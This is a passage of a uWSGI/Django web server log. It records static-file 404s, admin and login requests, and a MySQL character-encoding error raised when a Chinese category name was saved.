msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1214/1515] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:16:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1215/1516] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:16:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1216/1517] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1217/1518] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1218/1519] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1219/1520] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1220/1521] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1221/1522] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:16:53 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1222/1523] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:16:53 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 1223/1524] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 09:17:05 2021] POST /kind-manage/ => generated 207096 bytes in 140 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1224/1525] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:17:06 2021] GET /kind-manage/? => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 37312] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1225/1526] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1226/1527] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1227/1528] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1228/1529] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1230/1531] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 55 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1229/1530] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1231/1532] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1232/1533] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:17:06 2021] GET /static/css/spinners.css => generated 3516 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1233/1534] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:17:06 2021] GET /static/css/animate.css => generated 3513 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1234/1535] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:20:51 2021] GET /kind-manage/? => generated 0 bytes in 17 msecs (HTTP/1.1 302) 8 headers in 301 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1235/1536] 219.228.146.156 () {42 vars in 912 bytes} [Thu Jan 14 09:20:51 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1236/1537] 219.228.146.156 () {42 vars in 914 bytes} [Thu Jan 14 09:20:51 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1538] 219.228.146.156 () {40 vars in 824 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1539] 219.228.146.156 () {40 vars in 846 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1540] 219.228.146.156 () {40 vars in 828 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1541] 219.228.146.156 () {40 vars in 826 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1542] 219.228.146.156 () {40 vars in 832 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1543] 219.228.146.156 () {40 vars in 807 bytes} [Thu Jan 14 09:20:51 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1544] 219.228.146.156 () {40 vars in 805 bytes} [Thu Jan 14 09:20:52 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1545] 219.228.146.156 () {40 vars in 823 bytes} [Thu Jan 14 09:20:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1546] 219.228.146.156 () {40 vars in 821 bytes} [Thu Jan 14 09:20:52 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1547] 219.228.146.156 () {40 vars in 813 bytes} [Thu Jan 14 09:20:52 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1548] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 09:20:52 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 1237/1549] 219.228.146.156 () {48 vars in 974 bytes} [Thu Jan 14 09:20:58 2021] POST /my-admin/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1239/1550] 219.228.146.156 () {48 vars in 1018 bytes} [Thu Jan 14 09:21:00 2021] POST /my-admin/ => generated 27 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1239/1551] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 09:21:00 2021] GET /admin-home/ => generated 6515 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1240/1552] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 09:21:01 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1241/1553] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1242/1554] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1243/1555] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:21:01 2021] GET /static/css/spinners.css => generated 3516 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1244/1556] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1245/1557] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1246/1558] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 41 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1247/1559] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1248/1560] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1249/1561] 219.228.146.156 () {38 vars in 818 bytes} [Thu Jan 14 09:21:01 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1250/1562] 219.228.146.156 () {40 vars in 931 bytes} [Thu Jan 14 09:21:09 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1251/1563] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1252/1564] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1253/1565] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1254/1566] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1255/1567] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1256/1568] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1257/1569] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1258/1570] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 09:21:09 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1259/1571] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 09:21:09 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1260/1572] 219.228.146.156 () {48 vars in 1026 bytes} [Thu Jan 14 09:21:18 2021] POST /kind-manage/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1261/1573] 219.228.146.156 () {40 vars in 932 bytes} [Thu Jan 14 09:21:19 2021] GET /kind-manage/ => generated 7368 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1262/1574] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1263/1575] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1264/1576] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1265/1577] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1266/1578] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1267/1579] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1268/1580] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1269/1581] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 09:21:19 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1270/1582] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 09:21:19 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1271/1583] 180.160.72.163 () {38 vars in 826 bytes} [Thu Jan 14 09:22:47 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1584] 180.160.72.163 () {40 vars in 815 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1585] 180.160.72.163 () {40 vars in 837 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1586] 180.160.72.163 () {40 vars in 819 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1587] 180.160.72.163 () {40 vars in 823 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1588] 180.160.72.163 () {40 vars in 817 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1589] 180.160.72.163 () {40 vars in 798 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1590] 180.160.72.163 () {40 vars in 814 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1591] 180.160.72.163 () {40 vars in 804 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1592] 180.160.72.163 () {40 vars in 812 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1593] 180.160.72.163 () {40 vars in 796 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1594] 180.160.72.163 () {40 vars in 869 bytes} [Thu Jan 14 09:22:47 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: 0|req: 1272/1595] 180.160.72.163 () {48 vars in 959 bytes} [Thu Jan 14 09:23:01 2021] POST /login/ => generated 27 bytes in 37 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1273/1596] 